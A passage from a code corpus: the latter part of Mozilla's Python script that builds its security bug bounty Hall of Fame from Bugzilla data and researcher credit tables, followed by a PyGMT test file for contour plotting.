"b5e1a616809a7f78f4b1709fa2cae1ac" : "Steven M Crane", "b6bf77041fb088d18af139e5eeafb4e9" : "Mohammed Mido from connectps.com", "b7b33547a73d2d2c7325f2c47406805f" : "Rakesh Mane", "b99b716bfc8db49cb857b8996fdc39f1" : "Arthur Edelstein", "ba257210862ef5ec1080279dd1bec6c4" : "Ken Okuyama", "bc1ce7e8b84b814c2eaf2566e4787881" : "Brian Smith", "bc9f571d28511fa67d79a20b81d1cd58" : "Kalel", "bca639214bd2b582e62763ecc183babd" : "Mike Cardwell", "bf39fa273742eda0011a11c8e5369e4b" : "Nicolas Grégoire of AGARRI", "c0b9ff5423b4fb9dc26b58576cd4497a" : "Toni Huttunen", "c0f5791dfa8c00979d4df44e3f25f884" : "Nicolas Trippar of Zimperium zLabs", "c154b0d9921cf1fdb945c0b446cc28e7" : "Anonymous", "c4d4cb75f73c13335d00b84a245e8543" : "Zijie Zhao", "c4e343b957ed04e78035e9f1e9b99290" : "Filipe Gomes", "c78082d6d5aae54b54f48cecc0f97bed" : "Ms2ger of Igalia", "c8828ea7069b5acf239d313675eec592" : "R at Zero Day LLC", "ca5c500dbd892f7c06f6a7323220b2b6" : "Scott Zimmermann", "cbbcaac86318f769b1f0b9237af85927" : "Yuji Tounai of Mitsui Bussan Secure Directions, Inc.", "cc25b3565b0e7f0a2bde8c4e8cecbbd5" : "Nikita Arykov - Security Architect at Pushwoosh Inc.", "cc84fd0104bbdf21f5ebfe017f47ba31" : "Quarkslab security engineer Francis Gabriel", "cd0b10f0a5f56b3d04ea1a11cd009500" : "Aki Helin", "d4c22b801d906fd988e857e28e0d4398" : "team509", "d53d5650291b09956d8d8fdc488e1d5b" : "Armin Razmjou", "d6baf622b490bffd8c025e615ef460d2" : "crixer", "d77e4bf715af2d76c9c3ae565a21d40f" : "Gary Kwong", "d8edb7c1182dd0cc123dc47dcac28cee" : "Zhanjia Song", "d9147aad8edeb19e373570a6cb612b31" : "Rhys Enniks", "da370b9a066b1f80464a33801840e392" : "Team sutegoma2 - Japanese CTF team from AVTOKYO", "db59cb01d7b08db1a46c7f7834ff21fa" : "Iain Nicol of Iainteractive", "dd54e66b7d54126ca5647d1fd2492353" : "Craig Disselkoen", "ddab7e562afbe5ef1b37ad29ed33effe" : "Lukas Bernhard", "ddc9459ee44cb5366ad418f992aa47a3" : "Brandon Wieser of Cyber Sensei", "de93fee584390b928b2d12bd3d198fc0" : "0days Engineer", "dfce8e4c8278c73ffa3ace9344e86572" : "Antoine Delignat-Lavaud", "e064c5dd0686bd77a7bb7cc538547d8d" : "Jethro Beekman - Security Researcher at University of California - Berkeley", "e0a2ecaef5c7fa9bf90731771aac2e95" : "Marc Schoenefeld", "e0d23fbace24417f6260c181a10b0f3f" : "Tadj Youssouf", "e22e60864c27178d2469566dbcfb4e09" : "Michal Zalewski", "e2b442dbd6ddf0e28802b71bb4cf4376" : "Artur Osiński (Virtual_ManPL)", "e310574c3c35c503d99ef03885b7ef3a" : "Jay Gilbert", "e33752885775e4a274c6db31c995434b" : "Brian Carpenter of Geeknik Labs & Farm", "e4e810ec230795b44abbeb37d56b86e8" : "Abdulrahman Alqabandi of Microsoft Browser Vulnerability Research", "e5d2322aa516d90b7eb9a84d7b890938" : "Björn Ruytenberg", "e750febf3b1e213b458f017fac835b27" : "Rh0", "e751036f55bbf501042162b16c883b4e" : "Nicolas Francois", "e7ae95aeff3bef60565d9a3bed3cfe46" : "Frederic Besler @ LAF INTL", "e875c787e17ec52abf8d743191dfdb57" : "Jun Kokatsu", "e88dc79e62596108bef66ec6d6d103fa" : "Wladimir Palant", "e8abc376c3254bcb714b250241b75011" : "insertscript", "e8df4fcdfce3352bfa7c8cc4f30cf852" : "Thomas Imbert", "e8f888d34d0dea54f388def803d7b4ab" : "Vladimir Dmitriev", "e98a60be99d8cad03ab7bda278934d00" : "Matheus Vrech", "ea3d4c453e3dcd5b7c3430a9d3b5cecf" : "Jann Horn", "ebb36808fc8bce5670bf7c40f8f79a07" : "Gunes Acar", "ec2382571a4578416a9eef5ec2e8a937" : "Nils", "ecbb5f9fa8cdf3d6339da4dc4bd08593" : "Thai \"thaidn\" Duong", "eeb20e34ecf97f18c09819a8189a917a" : "Masato Kinugawa", "f1bf10afb7f316883b9f79f73f72786a" : "Wen Xu of SSLab Georgia Tech", "f1d319a4f2eaf69d8489a741df1500d8" : "Francisco Alonso", "f2c90725c145fe10ebe35533891a1cbc" : "fatal0", "f42ea3053e8f3c5af81d1a33cb46e47e" : "Tsubasa Iinuma of Gehirn Inc.", "f45fcaee888e8eab311d5d869b48f6e4" : "Zach Hoffman", "f46a207798ca14de0287172ce8d47783" : "Linus Särud", "f5550452710913283cbf6db0976e2420" : "Konark Modi of Cliqz GmbH", "f6628355de51d96186ee030cb936b04b" : "Pham Bao of VinCSS (Member of Vingroup)", "f6b2efbb344d0d64af70bcae3e3fc896" : "Mohammad Owais", "f8266c7296c7f7d996e0040ad7843bf0" : "Robert Kugler", "f9a504736e3206f7ab9995d0dda25a63" : "Boopathi Senthilkumar", "fa9ffd84a1dd2951bcb0d7f8ebae5c84" : "Philip Okhonko", "fcf7ed040fa3561f7c7f23784de25ca6" : "R at Zero Day LLC", "fe7f319c61c0b44d4cb751afda4f4aeb" : "Gaurav Popalghat", "fea05bd1b815660051bf5d090eb4e522" : "Aral Yaman", } twitter_entries = { "9513cb577e79e3f73e3af0886ba27e70":"@hjy79425575", "e4c8c633605b27018520a5a35934c884":"@proabiral", "8aeb1a975c9c817eb6638851058fa5f2":"@R3dpars3c", "305a3f15dfabae7353bf675ca5b7a23d":"@dnpushme", "0c7f4b38ad0b504cfc48042e14564cc8" : "@pdjstone", "0cdb9b89f615c444f832e56c844e9e75" : "@ally_o_malley", "0eaafbf6f9aabe86a4b040ca50d9191a" : "@5hint0", "192e0a963474e27f64bf46f0ddde8268" : "@sebbity", "1cc583009e744f3a2e63c6ca0ca72c10" : "@RandomDhiraj", "1d239c1ff42a3e8e1c16c976020fd45f" : "@pkewisch", "3597ac4747474360b391a5e359948ca9" : "@netfuzzer", "359ee9ee2e4c35e5fa8097e48bd22c50" : "@vladimir_metnew", "38161e481b381a72de3c4804a292d4ab" : "@attekett", "3a98d1971bc7fab8d457063492a5a467" : "@rafaybaloch", "3c9e02bf1983fa620099841bb91ea3e0" : "@Black2Fan", "480d732942ba3ecdedf961ce3fa9fc64" : "@nowaskyjr", "4a5880b0447f7349c9cbcff76045b3e6" : "@Bijoora", "4bf2165b96b2506a0ac2212b39fb78b1" : "@BloodyTangerine", "5080064df3a2c21441c9fb6cc3b5f816" : "@declme", "55f0363f4c86284fe5689525c5640c32" : "@dottor_morte", "59260d270baa2ce555fcf323c46d0c03" : "@arshadkazmi42", "64e04ce43d3007a00b51c63553c48efb" : "@p4fg", "7ec079736a63d226ce3b436b5f49b1d9" : "@bananabr", "81236113f95cd9d1591343e78fe204c5" : "@kid1ng", "815f2b92b84655f6a7e9e53ad10e78f4" : "@HarperMitchell", "82d7844614f152d6865e83d43f040a8b" : "@asanso", "8363fd9f9f37fbaf5d600e676bf3aec5" : "@agamimaulana", "89a138d6477c6a80b7f6c2e59a6c2fa4" : "@csanuragjain", "9219e61c33ff1e2d14b670b865caffa8" : "@c0d3G33k", "9667bad21b75845c367e1c91ea59d788" : "@jensvoid", "977f16d94af9ed0b87f3d10b766f4f07" : "@luotojesse", "9832ee85d3227243306872874b7157ea" : "whucjj", "9a7ef4ebc1fe8c5e7f59016564db97b4" : "@yossioren", "9d3bc5f160291389423da6ff52f5bc44" : "l4wio", "9d69c86b66ca54565cd98aec6b6baaa3" : "@0xsobky", "9de234ea6d5568ef604dd3431af941e4" : "@Windowsrcer", "a01c8445e5c582a2465b1ff75ab6b4d9" : "@kanytu", "a9173d90c2151988a643fee35abafb9f" : "@jupenur", "af5f683612b2560ceeb75586a09f8525" : "@ar_arv1nd", "b1a7c3c63dd184cfac07998a22977ccc" : "@hm_harshit", "b1bce803655916f8687d2da2787a17c6" : "@clavoillotte", "b5e1a616809a7f78f4b1709fa2cae1ac" : "@stevenmcrane ", "cbbcaac86318f769b1f0b9237af85927" : "@yousukezan", "dd54e66b7d54126ca5647d1fd2492353" : "@craigdissel", "e33752885775e4a274c6db31c995434b" : "@geeknik", "e4e810ec230795b44abbeb37d56b86e8" : "@qab", "e875c787e17ec52abf8d743191dfdb57" : "@shhnjk ", "e8abc376c3254bcb714b250241b75011" : "@insertscript", "e8df4fcdfce3352bfa7c8cc4f30cf852" : "@masthoon", "ecbb5f9fa8cdf3d6339da4dc4bd08593" : "@xorninja", "f1d319a4f2eaf69d8489a741df1500d8" : "@revskills", "f2c90725c145fe10ebe35533891a1cbc" : "@fatal0_", "f42ea3053e8f3c5af81d1a33cb46e47e" : "@llamakko_cafe", "f45fcaee888e8eab311d5d869b48f6e4" : "@zrhoffman", "f46a207798ca14de0287172ce8d47783" : "@_zulln", "f5550452710913283cbf6db0976e2420" : "@konarkmodi", "f6b2efbb344d0d64af70bcae3e3fc896" : "@_mohammadowais", "fa9ffd84a1dd2951bcb0d7f8ebae5c84" : "@sysmus28", "fe7f319c61c0b44d4cb751afda4f4aeb" : "@Gaurav_00000", } url_entries = { "e6f0d7b286f04f05d4ac4ae498bf2a32":"https://linkedin.com/in/yarbabin", "fdfe2689e2668dcfe620ac81a741fde8":"https://www.linkedin.com/in/harshbanshpal/", "f72d4bcd18f0526f8faa4f781513c91f":"https://www.linkedin.com/in/hafiizh-7aa6bb31/", "a480398726999a758b808aed02ef5e5e":"https://www.linkedin.com/in/yabeow/", "0f14322cc49704ac5551ffe5835abd69" : "https://www.wayanadweb.com", "1248a90a05c7e3a46b97e6aceeb557ce" : "https://skylined.nl", "15acbd736229d79a8ed92e690164559c" : "https://www.nilsand.re/", "18844199a107c0665b6de05b47ce0340" : "https://www.tattiebogle.net/", "192aac4383d85b9acf43554612c6b461" : "https://facebook.com/vitaly.nevgen", "1c04ef59bd60189ce09cfca187225e75" : "https://www.linkedin.com/in/mohammedfayez", "1d6eb1c6e8a177847eca74cad00fc301" : "https://tecnoblog.guru/", "1e304bfde59dcfb0131e21e913281614" : "https://gubello.me", "1ffe73fabf298c651b7a8c750de530d2" : "https://fukusa.nl", "21c712eaa986e0ae3e135fe689259684" : "http://dracos.co.uk/", "2841918025ae79884c3eac763a453b76" : "https://koelner-pc-hilfe.de", "2920656b8c8d785f7ccecab735a106a8" : "https://skylined.nl", "2bb8b9860ce62f3fbc9e7eec1a9d5ed0" : "https://maone.net", "3c098d6ead472177028bde34acacb5f1" : "http://www.mbsd.jp/", "3f3fae9ad20da4c5655ceda765563e6c" : "https://www.vulnerability-lab.com", "47403ba3cf9bcae0874a07f299f643f0" : "https://struct.github.io", "4a5880b0447f7349c9cbcff76045b3e6" : "https://facebook.com/Bijoora", "4b7fd0d6665950db856bc5e22846f719" : "http://www.trapkit.de/", "4cb38b42bb161ce775b5e7f91d260d3f" : "https://www.linkedin.com/in/daniel-maksimovic-73537882", "654445704639346f526d1ef514d08fd7" : "https://acrossecurity.com/", "6c5314d59c2e56564b18fe6199305fd3" : "https://www.facebook.com/Fatality04", "740b81a60bd25700b839f63e8d937796" : "http://linkedin.com/in/karthik-kumar-reddy-3b10b4128", "755ae0590425c02b3c203036df1a7e1e" : "http://www.securesoftware.nl", "77af16493363287bc9b6ed99548293d7" : "https://www.aryansinha.com/", "77b1dc2043055d86d9e81b5035efe29f" : "https://www.linkedin.com/in/sourc7/", "7aba285c7e4b7f41df3dae6f4becd2a9" : "https://bishopfox.com/", "7bd9d5640cb0f0dd5e59ccd7b02a0349" : "https://krashconsulting.com", "7e1e41ab0cd46a4a32c82def7b840a6d" : "http://cure53.de/", "7edb6115b239d771b9689857b9e95568" : "https://hboeck.de/", "80e0b8cb2a22f8b9669d2ca1968ce898" : "https://ewirch.github.io/", "817bd7bdff0d93ccdada8707b5278a08" : "https://axen-cyber.com", "8314603008777278fd70c0b9b4f01645" : "http://www.adambarth.com/", "9228cdb27944fb384f1305d2d0c350b8" : "https://facebook.com/tkrawool", "95663a4cc4fa467fdd949b16b6e03760" : "https://labs.f-secure.com/", "9684d8c1d955335cb2ba23ddab9769ac" : "http://www.kerneronsec.com/", "9b50ae1f239de9709af5f1db53629f8c" : "https://bughunter.withgoogle.com/profile/3c96630c-9112-4ddb-a029-df2bb893c6c3", "9d81009615f1e3b3b269eb78a4abd529" : "https://www.linshunghuang.com/", "9e6d48cc96c5931585cbe2bfc66246b8" : "https://haltp.org", "a63f14172a1a1763ebe352317a9c9156" : "https://hackerone.com/derision", "a71a35e2a42f69964a986531483ab405" : "https://jswrenn.com/", "abb98d52131c2c03f832122ea7f9308b" : "https://www.linkedin.com/in/ismailtasdelen/", "ac6cb3312f13091a2b1ab69bb496057d" : "https://robwu.nl", "b1a7d637734d5dad9b43136609c8f31f" : "https://www.zippenhop.com/", "b7b33547a73d2d2c7325f2c47406805f" : "https://rakeshmane.com/", "bc1ce7e8b84b814c2eaf2566e4787881" : "https://briansmith.org/", "bca639214bd2b582e62763ecc183babd" : "https://www.grepular.com/", "bf39fa273742eda0011a11c8e5369e4b" : "http://www.agarri.fr/", "c78082d6d5aae54b54f48cecc0f97bed" : "https://twitter.com/Ms2ger", "ca5c500dbd892f7c06f6a7323220b2b6" : "https://github.com/sczi", "d53d5650291b09956d8d8fdc488e1d5b" : "https://rawsec.net/", "d77e4bf715af2d76c9c3ae565a21d40f" : "https://www.ygitsoftware.com/", "da370b9a066b1f80464a33801840e392" : "http://ja.avtokyo.org/projects/sutegoma2", "db59cb01d7b08db1a46c7f7834ff21fa" : "https://www.iainnicol.com/", "ddc9459ee44cb5366ad418f992aa47a3" : "http://www.cybersensei.io", "de93fee584390b928b2d12bd3d198fc0" : "http://0days.engineer", "dfce8e4c8278c73ffa3ace9344e86572" : "https://antoine.delignat-lavaud.fr", "e064c5dd0686bd77a7bb7cc538547d8d" : "https://jbeekman.nl/", "e0a2ecaef5c7fa9bf90731771aac2e95" : "https://de.linkedin.com/in/marcschoenefeld", "e22e60864c27178d2469566dbcfb4e09" : "http://lcamtuf.coredump.cx/", "e2b442dbd6ddf0e28802b71bb4cf4376" : "https://bugzilla.mozilla.org/user_profile?user_id=342842", "e5d2322aa516d90b7eb9a84d7b890938" : "https://bjornweb.nl/", "f8266c7296c7f7d996e0040ad7843bf0" : "https://www.s3cur3.it/", } client_products = [ "Core", "External Software Affecting Firefox", "GeckoView", "Firefox", "Firefox for Android", "Firefox for iOS", "Mozilla VPN", "Fenix", "Focus", "Focus-iOS", "Lockwise", "MailNews Core", "NSPR", "NSS", "Pocket", "Thunderbird", "Toolkit", "WebExtensions", "DevTools", "Calendar", ] web_products = ["Cloud Services", "Data Platform and Tools", ] def is_client_bug(bug): # We have a limited number of for-certain web products # but for the most part we rely on !client if bug['product'] in web_products: return False if bug['product'] == "Testing" and bug['component'] == "geckodriver": return True # A lot of Pocket bugs are web bugs, but some are client if bug['product'] == "Pocket": return not bug['component'] == "getpocket.com" if bug['classification'] == "Client Software": if bug['product'] == "Emerging Markets" and bug['component'] in ["Security: Firefox Lite"]: return True if bug['product'] not in client_products: # this is an edge case we should validate and improve raise Exception("Classification: '{0}' Product: '{1}' Component: '{2}' is not considered a client bug, please confirm.".format(bug['classification'], bug['product'], bug['component'])) return bug['product'] in client_products # Set up the requests retry/backoff strategy retry_strategy = Retry( total=5, status_forcelist=[429, 500, 502, 503, 504], method_whitelist=["HEAD", "GET", "OPTIONS"], backoff_factor=2 ) adapter = HTTPAdapter(max_retries=retry_strategy) http = requests.Session() http.mount("https://", adapter) http.mount("http://", adapter) def main(): args = command_line() # Do this first so we error immediately if the file isn't there. with open(os.path.abspath(args.output), 'r') as f: file_data = f.read() f.close() hmackey = get_hmac_key(args.apikey) debuglogfilename = 'debuglog.' + str(int(time.time())) + '.log' debuglog = open(debuglogfilename, 'w') print("Okay, we're going to start. Have you assigned hof+ to the eligible bugs with bounty- and CVEs?") print("The link for those for you to review is:") print(" ", CVE_REVIEW.replace("YEAR_REPLACEME", args.year)) print("If you forgot to do this, kill the script, do it, and start it again.") print("I'm logging to", debuglogfilename) bugs = gather_bug_list(args.apikey) hof_entries = [] (begin_date, end_date) = define_dates(args.quarter, args.year) print("Generating Bug Data from " + str(len(bugs["bugs"])) + " bugs") num_processed = 0 for bug in bugs["bugs"]: bugid = str(bug["id"]) debuglog.write(bugid + ",") debuglog.write(bug['classification'] + ",") debuglog.write(bug['product'] + ",") debuglog.write(bug['component'] + ",") num_processed += 1 #if num_processed % 100 == 0: print("Processed", num_processed, "of", len(bugs["bugs"]), "currently on", bugid) if args.client and not is_client_bug(bug): debuglog.write("wrong product: " + bug['product'] + "\n") continue elif args.web and is_client_bug(bug): debuglog.write("wrong product: " + bug['product'] + "\n") continue data ={'bugid':bugid} # ========================================================================================== # Look for the bug bounty attachment first attachment_url = BASE_URL + 'bug/' + bugid + '/attachment' try: attachments = http.get(attachment_url, headers=HEADERS, params={'api_key' : args.apikey}).json()['bugs'][bugid] except Exception as e: print ("Error in " + bugid) print (e) continue # attachment_breakout[0] = email # attachment_breakout[1] = paid # attachment_breakout[2] = reported date # attachment_breakout[3] = fixed date # attachment_breakout[4] = awareded date # attachment_breakout[5] = publish (true/false) # attachment_breakout[6] = credit # attachment_breakout[7] = twitter # attachment_breakout[8] = url foundAttachment = None for attachment in attachments: if attachment['file_name'] == 'bugbounty.data' and attachment['is_private'] == 1: if foundAttachment and bugid not in ["913805"]: raise Exception("Two bug bounty attachments were found for " + bugid) foundAttachment = attachment if foundAttachment: # Old bugs with weird formats if bugid in ['1074642']: continue try: attachment = foundAttachment attachment_breakout = [x.strip() for x in attachment['description'].split(',')] data["email"] = attachment_breakout[0] data["email_hmac"] = hmac_email(hmackey, attachment_breakout[0]) data["date_raw"] = attachment_breakout[4] or attachment_breakout[3] or attachment_breakout[2] data["date"] = datetime.strptime(data["date_raw"], '%Y-%m-%d') debuglog.write("bounty+," + data["date_raw"] + "," + data["email"] + "," + data["email_hmac"] + ",") if begin_date < data["date"] < end_date: if "@mozilla.com" in data["email"] and mozilla_email_was_employed(data["email"], data["date"]): debuglog.write("Mozilla Employee in a Bug Bounty Attachment??\n") # Don't add Mozilla employees filing bugs under their work email to the HOF continue # print("Generating Data For Bug %s - %s" % (bugid, data["email"])) numFields = len(attachment_breakout) if not bool(attachment_breakout[5]): debuglog.write("Publish was blank,") elif "no" == attachment_breakout[5].lower() or "false" == attachment_breakout[5].lower(): debuglog.write("Do Not Publish\n") continue else: debuglog.write("publish,") data["name"] = "" if numFields > 6 and attachment_breakout[6]: data["name"] = attachment_breakout[6] if "[paid]" in data["name"]: data["name"] = "" elif "no response" in data["name"]: data["name"] = "" elif data["name"][0] == '"' and data["name"][-1] == '"': data["name"] = data["name"][1:-1] if data["name"] and data["email_hmac"] not in credit_entries and \ check_add_credit_to_script(data["email"], data["name"]): add_credit_to_script(hmackey, data["email"], data["name"]) if not data["name"] and data["email_hmac"] in credit_entries: data["name"] = credit_entries[data["email_hmac"]] elif not data["name"]: user_url = BASE_URL + 'user?names=' + data["email"] try: user_response = http.get(user_url, headers=HEADERS) user_response_data = user_response.json() except requests.exceptions.RequestException as e: print("Could not get user data for " + user_url) print(e) sys.exit(1) if user_response.status_code == 200 and user_response_data['users'][0]["real_name"]: data["name"] = user_response_data['users'][0]["real_name"] else: data["name"] = data["email"].split('@', 1)[0] print("Had to use fallback name for", bugid, data["email"], data["name"]) data["quarter-string"] = data["date_raw"][0:4] + month_to_quarter(data["date_raw"][5:7]) if data["email_hmac"] in twitter_entries: data["twitter"] = twitter_entries[data["email_hmac"]] elif numFields > 7 and attachment_breakout[7]: data["twitter"] = attachment_breakout[7] add_twitter_to_script(hmackey, data["email"], data["twitter"]) if data["email_hmac"] in url_entries: data["url"] = url_entries[data["email_hmac"]] elif numFields > 8 and attachment_breakout[8]: data["url"] = attachment_breakout[8] add_url_to_script(hmackey, data["email"], data["url"]) if not "url" in data and "twitter" in data: data["url"] = "https://twitter.com/" + data["twitter"] hof_entries.append(data) debuglog.write(data["name"] + "," + (data["url"] if 'url' in data else "") + "\n") continue # Go to next bug else: debuglog.write("Date wasn't in range\n") continue except: debuglog.write("Printed Exception\n") import traceback print("--------------------------------------------------------") print("Could not process %s" % bugid) print("Attachment field: %s" % attachment['description']) print("Split fields: %s" % attachment['description'].split(',')) print(traceback.format_exc()) print("--------------------------------------------------------") continue # ========================================================================================== # If we didn't find a bounty attachment, then it's a Hall of Fame Entry if 'cf_last_resolved' not in bug or not bug['cf_last_resolved']: # Unusual case data["date_raw"] = bug['creation_time'].split("T")[0] else: # Normal case data["date_raw"] = bug['cf_last_resolved'].split("T")[0] data["date"] = datetime.strptime(data["date_raw"], '%Y-%m-%d') debuglog.write("bounty-," + data["date_raw"] + ",") if begin_date < data["date"] < end_date: data["name"] = "" data["email"] = bug['creator_detail']['email'] data["email_hmac"] = hmac_email(hmackey, data["email"]) debuglog.write(data["email"] + "," + data["email_hmac"] + ",") if "@mozilla.com" in data["email"] and mozilla_email_was_employed(data["email"], data["date"]): debuglog.write("Mozilla Employee??\n") # Don't add Mozilla employees filing bugs under their work email to the HOF continue # print("Generating Data For Bug %s - %s" % (bugid, data["email"])) if data["email_hmac"] in credit_entries: data["name"] = credit_entries[data["email_hmac"]] else: user_url = BASE_URL + 'user?names=' + data["email"] try: user_response = http.get(user_url, headers=HEADERS) user_response_data = user_response.json() except requests.exceptions.RequestException as e: print("Could not get user data for " + user_url) print(e) sys.exit(1) if user_response.status_code == 200 and user_response_data['users'][0]["real_name"]: data["name"] = user_response_data['users'][0]["real_name"] else: data["name"] = data["email"].split('@', 1)[0] print("Had to use fallback name:", bugid, data["email"], data["name"]) data["quarter-string"] = data["date_raw"][0:4] + month_to_quarter(data["date_raw"][5:7]) if data["email_hmac"] in twitter_entries: data["twitter"] = twitter_entries[data["email_hmac"]] if data["email_hmac"] in url_entries: data["url"] = url_entries[data["email_hmac"]] if not "url" in data and "twitter" in data: data["url"] = "https://twitter.com/" + data["twitter"] hof_entries.append(data) debuglog.write(data["name"] + "," + (data["url"] if 'url' in data else "") + "\n") continue # Go to next bug (although we're already at the end of the loop.) else: debuglog.write("Date wasn't in range\n") continue def soryByDate(val): return val["date"] hof_entries.sort(key=soryByDate, reverse=True) oneEntryPerQuarter = set() hof_output = "" hof_bugzilla_queryarg = "" for data in hof_entries: try: hof_bugzilla_queryarg += data['bugid'] + "," thisData = data["name"] + " " + data["quarter-string"] if thisData in oneEntryPerQuarter: continue oneEntryPerQuarter.add(thisData) hof_output = hof_output + "- name: {}\n".format(data["name"]) hof_output = hof_output + " date: {}\n".format(data["date_raw"]) if "twitter" in data: hof_output = hof_output + " twitter: \"{}\"\n".format(data["twitter"]) if "url" in data: hof_output = hof_output + " url: {}\n".format(data["url"]) except Exception as e: print("Could not write hof entry for ", data["name"]) final_output = file_data[:6] +'\n' + hof_output.rstrip() + file_data[6:] with open(os.path.abspath(args.output), 'w') as output_file: output_file.write(final_output) print("I logged to", debuglogfilename) print("Here is a bugzilla query showing all the bugs I processed for this quarter. Please note that a reporter _may_ have multiple bugs, so don't remove them from the HOF for a misplaced bug without double checking.") print("https://bugzilla.mozilla.org/buglist.cgi?quicksearch={0}".format(hof_bugzilla_queryarg)) def define_dates(quarter, year): if quarter == "doitall": begin_date = datetime.strptime("{}-01-01" .format(2000), '%Y-%m-%d') end_date = datetime.strptime("{}-12-31" .format(2019), '%Y-%m-%d') elif int(quarter) == 1: begin_date = datetime.strptime("{}-01-01" .format(year), '%Y-%m-%d') end_date = datetime.strptime("{}-03-31" .format(year), '%Y-%m-%d') elif int(quarter) == 2: begin_date = datetime.strptime("{}-04-01" .format(year), '%Y-%m-%d') end_date = datetime.strptime("{}-06-30" .format(year), '%Y-%m-%d') elif int(quarter) == 3: begin_date = datetime.strptime("{}-07-01" .format(year), '%Y-%m-%d') end_date = datetime.strptime("{}-09-30" .format(year), '%Y-%m-%d') elif int(quarter) == 4: begin_date = datetime.strptime("{}-10-01" .format(year), '%Y-%m-%d') end_date = datetime.strptime("{}-12-31" .format(year), '%Y-%m-%d') else: print("not a valid quarter") exit(1) return(begin_date, end_date) def month_to_quarter(month): if int(month) <= 3: return str(1) elif int(month) <= 6: return str(2) elif int(month) <= 9: return str(3) else: return str(4) def command_line(): parser = argparse.ArgumentParser() parser.add_argument("-a", "--apikey", help="Bugzila API key") parser.add_argument("-f", "--output", help="YAML file") parser.add_argument("-y", "--year", help="year") parser.add_argument("-q", "--quarter", help="quarter as digit") parser.add_argument("-w", "--web", help="Process Web Bugs", action='store_true') parser.add_argument("-c", "--client", help="Process Client Bugs", action='store_true') parser.add_argument("--sort-credit-entries", help="Do not update Hall of Fame, just sort the credit entries and output them", action='store_true') parser.add_argument("--hmac", help="hmac an email address") args = parser.parse_args() if args.sort_credit_entries: print("credit_entries = {") for k in sorted(credit_entries): print(" \"" + k + "\" : \"" + credit_entries[k].replace("\"", "\\\"") + "\",") print("}") print("twitter_entries = {") for k in sorted(twitter_entries): print(" \"" + k + "\" : \"" + twitter_entries[k].replace("\"", "\\\"") + "\",") print("}") print("url_entries = {") for k in sorted(url_entries): print(" \"" + k + "\" : \"" + url_entries[k].replace("\"", "\\\"") + "\",") print("}") sys.exit(0) elif args.hmac and args.apikey: print(hmac_email(get_hmac_key(args.apikey), args.hmac)) sys.exit(0) elif args.hmac: print("If you request hmac you must also supply --apikey") sys.exit(1) else: if not args.apikey or not args.output or not args.year or not args.quarter: parser.print_help() sys.exit(1) if not args.client and not args.web: print("Either --web or --client is required.") sys.exit(1) return args def check_add_credit_to_script(email, credit): if " and " in credit: # Do not by default, add double-credits as a mapping. return False if email == "replace@replace.com": # This was an old field used to indicate we were filing a bug for someone return False if "@mozilla.com" in email: # Do not add mozilla emails to script, we probably filed them for someone else. return False if credit.strip()[0] == "@": raise Exception("It looks like a Twitter handle is in the credit field.") return True def mozilla_email_was_employed(email, date): pre_employment_data = { 'jdemooij@mozilla.com' : datetime(year=2011, month=11, day=1), 'choller@mozilla.com' : datetime(year=2011, month=8, day=1) } if email not in pre_employment_data: return True return date > pre_employment_data[email] def hmac_email(hmackey, email): return hmac.new(hmackey, email.strip().lower().encode(), digestmod='md5').hexdigest() def add_credit_to_script(hmackey, email, credit): string_to_add = '"' + hmac_email(hmackey, email) + '":"' + credit + '",' with open(os.path.basename(__file__), 'r', encoding="utf-8") as in_script: script_data = in_script.read() index = script_data.find('credit_entries = {') + 18 final_output = script_data[:index] +'\n' + " " + string_to_add + script_data[index:] with open(os.path.basename(__file__), 'w', encoding="utf-8") as out_script: out_script.write(final_output) def add_twitter_to_script(hmackey, email, twitter): string_to_add = '"' + hmac_email(hmackey, email) + '":"' + twitter + '",' with open(os.path.basename(__file__), 'r', encoding="utf-8") as in_script: script_data = in_script.read() index = script_data.find('twitter_entries = {') + 19 final_output = script_data[:index] +'\n' + " " + string_to_add + script_data[index:] with open(os.path.basename(__file__), 'w', encoding="utf-8") as out_script: out_script.write(final_output) def add_url_to_script(hmackey, email, url): string_to_add = '"' + hmac_email(hmackey, email) + '":"' + url + '",' with open(os.path.basename(__file__), 'r', encoding="utf-8") as in_script: script_data = in_script.read() index = script_data.find('url_entries = {') + 15 final_output = script_data[:index] +'\n' + " " + string_to_add + script_data[index:] with open(os.path.basename(__file__), 'w', encoding="utf-8") as out_script: out_script.write(final_output) def gather_bug_list(apikey): try: bugs = http.get(search_url, headers=HEADERS, params={'api_key':apikey, 'include_fields': 'id, classification, product, component, cf_last_resolved, creator, creation_time'}).json() except requests.exceptions.RequestException as e: print(e) sys.exit(1) return bugs def get_hmac_key(apikey): key = "" try: response = http.get("https://bugzilla.mozilla.org/rest/bug/attachment/" + str(HMAC_KEY_ATTACHMENT_ID), headers=HEADERS, params={'api_key':apikey}).json() return base64.b64decode(response['attachments'][str(HMAC_KEY_ATTACHMENT_ID)]['data']) except requests.exceptions.RequestException as e: print(e) sys.exit(1) return key if __name__ == '__main__': main()
mozilla/foundation-security-advisories
update_hof.py
Python
mpl-2.0
46,500
[ "Brian" ]
c2fe1fe65e5c110feca6bbde2e9bd4e049a1b507061e934fc53ab65df9194e68
# pylint: disable=redefined-outer-name """ Tests contour. """ import os from itertools import product import numpy as np import pytest from pygmt import Figure from pygmt.exceptions import GMTInvalidInput TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), "data") POINTS_DATA = os.path.join(TEST_DATA_DIR, "points.txt") @pytest.fixture(scope="module") def data(): """ Load the point data from the test file. """ return np.loadtxt(POINTS_DATA) @pytest.fixture(scope="module") def region(): """ The data region. """ return [10, 70, -5, 10] def test_contour_fail_no_data(data): """ Should raise an exception if no data is given. """ # Contour should raise an exception if no or not sufficient data # is given fig = Figure() # Test all combinations where at least one data variable # is not given: for variable in product([None, data[:, 0]], repeat=3): # Filter one valid configuration: if not any(item is None for item in variable): continue with pytest.raises(GMTInvalidInput): fig.contour( x=variable[0], y=variable[1], z=variable[2], region=region, projection="X4i", color="red", frame="afg", pen="", ) # Should also fail if given too much data with pytest.raises(GMTInvalidInput): fig.contour( x=data[:, 0], y=data[:, 1], z=data[:, 2], data=data, region=region, projection="X10c", style="c0.2c", color="red", frame="afg", pen=True, ) @pytest.mark.mpl_image_compare def test_contour_vec(region): """ Plot an x-centered gaussian kernel with different y scale. """ fig = Figure() x, y = np.meshgrid( np.linspace(region[0], region[1]), np.linspace(region[2], region[3]) ) x = x.flatten() y = y.flatten() z = (x - 0.5 * (region[0] + region[1])) ** 2 + 4 * y ** 2 z = np.exp(-z / 10 ** 2 * np.log(2)) fig.contour(x=x, y=y, z=z, projection="X10c", region=region, frame="a", pen=True) return fig 